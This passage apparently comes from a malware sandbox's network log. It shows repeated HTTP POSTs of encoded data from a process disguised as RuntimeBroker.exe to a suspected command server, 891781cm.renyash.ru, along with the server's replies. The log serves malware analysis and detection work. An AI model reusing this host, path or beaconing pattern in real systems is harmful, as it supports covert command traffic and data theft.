                                                                                                                          Data Ascii: UV]VZ_TZUZTYQSUQX^\XYVR_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ (/ "%=<':. ^0<>U$,/.#+ )#^!'^)
                                                                                                                          Jan 1, 2025 04:23:01.296940088 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:01.553164959 CET808INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:01 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XEt%2Bfc8GD%2Bvrmj7jfwKTbpEn1qY1zOKF%2BG1sPu%2F4Dlt1zfaNFeIlQZx3XXvKtV6%2F9U3feELbdgjA37ULdN2fPE5PQCQINnfIPmqZ66FMW8mP1SM66SYkPxkVEcZxFLxAqChvkGfw"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6364d95e42d4-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4164&min_rtt=1725&rtt_var=5525&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=68747&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          76192.168.2.449849104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:01.679579020 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:02.084749937 CET1056OUTData Raw: 55 50 5d 53 5a 5f 51 5c 55 5a 54 59 51 59 55 53 58 5d 5c 59 59 53 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UP]SZ_Q\UZTYQYUSX]\YYSRY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#),! =&>=<&$1,$$$?.$;^/=8((,#^!'^)/
                                                                                                                          Jan 1, 2025 04:23:02.143409014 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:02.447218895 CET808INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:02 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZESTGFSDHzcUXeXki8js%2FHi9zeAforzx9UICbAGiGSruV5XHhMR8P1Xht0DNuJghXdq3zbaCx7Lo%2FZqY1nTHQ3qqwTr3pVwRrQWsTMY6am1Ea%2BB8f%2FJAWDUXQrgP7Jm4HIYdi%2Bc"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf636a1ad94400-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4277&min_rtt=2167&rtt_var=5034&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=76628&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          77192.168.2.449855104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:02.660526991 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:03.006112099 CET1048OUTData Raw: 55 5f 5d 51 5a 59 51 5c 55 5a 54 59 51 5b 55 52 58 58 5c 5a 59 52 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U_]QZYQ\UZTYQ[URXX\ZYRR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#</1 (21>9)/[&$V.'<]'W388.\=.(W><#^!'^)
                                                                                                                          Jan 1, 2025 04:23:03.136310101 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:03.405447960 CET811INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:03 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ua6dIy3CxXvGfWdVZmB7YpD5WaetEcezA3nqXukJcHSYwReD%2BwHrqpZeTwe8e%2FMzm98y%2B5v33Ai4tGAROwvjJAYzv%2F%2FEuEfSH%2B6NFwVVkEGQwfZsn74MRLhDvZG2ti1ymN3f7Vgc"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63705dc60f83-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9246&min_rtt=2993&rtt_var=13629&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=27536&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          78192.168.2.449861104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:03.522952080 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:03.881078959 CET1056OUTData Raw: 50 52 58 5d 5a 57 54 58 55 5a 54 59 51 53 55 5d 58 52 5c 5d 59 52 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PRX]ZWTXUZTYQSU]XR\]YRRZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ X??7;!%.(-,&4%: 0,"T3+_8.;+X$V>#^!'^)
                                                                                                                          Jan 1, 2025 04:23:03.976736069 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:04.153059959 CET799INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:04 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JVfQoOde8SjFeQbDYeWUHwSmam1jtKTiLhW0pApBqdTqV5d1p9fcljTCZCRueG35j3YU1IZ6W8ncQSYRAE2d3I4iWUGChR6gjiZNoTO18QIDIrJIKu3tpVnCG0kceUZQm28Y67cC"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63759d444332-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2972&min_rtt=1748&rtt_var=3104&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=126461&cwnd=117&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          79192.168.2.449867104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:04.273948908 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:04.631125927 CET1056OUTData Raw: 55 51 58 56 5a 5e 54 5f 55 5a 54 59 51 5f 55 5d 58 5e 5c 5c 59 55 52 53 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UQXVZ^T_UZTYQ_U]X^\\YURS][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ^(<!Z +-[1>1Z)-7Y379-$$%,!$??->](=;*<#^!'^)7
                                                                                                                          Jan 1, 2025 04:23:04.745924950 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:04.933684111 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:04 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kciSjkQOoR43oo9yOVnEsS9oPT0JW%2BNPeEeT5l9UGuRbznoDQACgmOqlMUU9H0onT6TJVOizMRd8yg7yxhkBp2k8Tl95OjY1c7Ghyk%2BaMPud63kWP%2Fmbf1SBA5NHaUuX81rnWgDw"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf637a5e478cb4-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3318&min_rtt=2048&rtt_var=3308&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=119564&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          80192.168.2.449873104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:05.053215981 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:05.412986040 CET1056OUTData Raw: 50 56 58 57 5a 5a 54 58 55 5a 54 59 51 59 55 54 58 5c 5c 5e 59 55 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PVXWZZTXUZTYQYUTX\\^YURX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ _+,= &&.&*>Y3.Q9' X'&',8?X#)#^!'^)/
                                                                                                                          Jan 1, 2025 04:23:05.506058931 CET25INHTTP/1.1 100 Continue


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          81192.168.2.449879104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:05.590198040 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:05.943614960 CET1780OUTData Raw: 50 55 5d 56 5a 5a 51 5d 55 5a 54 59 51 58 55 50 58 5a 5c 5b 59 5d 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PU]VZZQ]UZTYQXUPXZ\[Y]RZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ?<" ;_%5\=Z$:'#3?0/X7?4),#^!'^)+
                                                                                                                          Jan 1, 2025 04:23:06.061239958 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:06.226793051 CET957INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:06 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jen8fV08NAvMEWSo%2BnKVgHHgfQfNFe5lOh3rw%2BhGcPF%2BFU8qTc%2BJmJIAKeuqNxS1VLiEBaEDRJM0aJtgqUaWvTCAbWUOWFuozpwFQkkbz9M%2Fji2CDbXAQhMDlhzXJeJ5bPEAoinC"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63829e33f795-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4394&min_rtt=1561&rtt_var=6252&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=60255&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 21 0f 26 2b 38 07 28 2d 3e 5a 2c 59 2b 50 26 59 3a 15 27 30 34 5f 25 58 36 00 2e 28 0e 5a 3e 28 30 07 24 29 36 00 21 22 2d 00 31 36 2e 5d 04 1d 25 58 3d 39 31 06 28 2f 39 5e 3d 21 20 58 30 37 06 00 26 34 23 03 27 2d 2a 58 21 0b 30 0c 33 33 05 0f 2a 3a 3b 12 26 2e 3e 50 21 2a 2e 57 0d 12 21 0d 32 10 31 53 3e 31 20 53 21 3f 2f 1e 33 11 37 1c 26 2f 2f 0c 23 01 22 57 3d 01 05 05 22 19 2d 57 24 5c 30 01 35 07 00 01 23 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98!&+8(->Z,Y+P&Y:'04_%X6.(Z>(0$)6!"-16.]%X=91(/9^=! X07&4#'-*X!033*:;&.>P!*.W!21S>1 S!?/37&//#"W="-W$\05#3"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          82192.168.2.449880104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:05.716526031 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:06.068614006 CET1056OUTData Raw: 55 56 5d 57 5f 59 51 55 55 5a 54 59 51 53 55 56 58 5d 5c 54 59 56 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UV]W_YQUUZTYQSUVX]\TYVRZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ (-71_&.*).Y34-9$\%/P''->4_<X(>#^!'^)
                                                                                                                          Jan 1, 2025 04:23:06.163072109 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:06.342935085 CET807INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:06 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mn5tEaxcl7IN0QVf8XxTpCWcs5Me2MfxNgs%2FtCDUwa7lz4f8r9jaakD7lcT38vWHQwTtIOFotmHNkP62%2B%2BGq0jY3bU3qhOvVxmrV%2BFw7tcg7Dh2kWjh1k9dxaMOCtqZaHSkmA9z"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63833b4c1831-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2826&min_rtt=1482&rtt_var=3245&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=119290&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          83192.168.2.449886104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:06.478281021 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:23:06.834348917 CET1056OUTData Raw: 55 5f 58 54 5f 5c 51 5a 55 5a 54 59 51 52 55 56 58 5c 5c 59 59 54 52 5d 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U_XT_\QZUZTYQRUVX\\YYTR]][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ )/%4(!_%X=Y=.<$,$'10?0/X4[<*<#^!'^)
                                                                                                                          Jan 1, 2025 04:23:06.931442976 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:07.190675974 CET808INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:07 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mCiVoV%2Fn1MDJjwMPtogJUzfkPwj6Uf7EE1RzClVJj4PgqIrN2HlPbHSGEtxONVFWYAXN%2BbdyAEWzps3CAHdgGhz5d778YrKzpcRFYY53JG%2Fmc5mjKUw9fNxaAn0hh%2BPwzEN%2B5WyH"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63880b09728d-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4977&min_rtt=1994&rtt_var=6715&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=56451&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          84192.168.2.449892104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:07.319097042 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:07.678096056 CET1056OUTData Raw: 55 50 58 52 5f 5a 51 5c 55 5a 54 59 51 5a 55 5c 58 5f 5c 59 59 5d 52 5d 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UPXR_ZQ\UZTYQZU\X_\YY]R]][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ Y<<=Z4)X&>)>= $&U94<_3>T$?<,4((*#^!'^)#
                                                                                                                          Jan 1, 2025 04:23:07.791454077 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:08.072086096 CET809INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:08 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
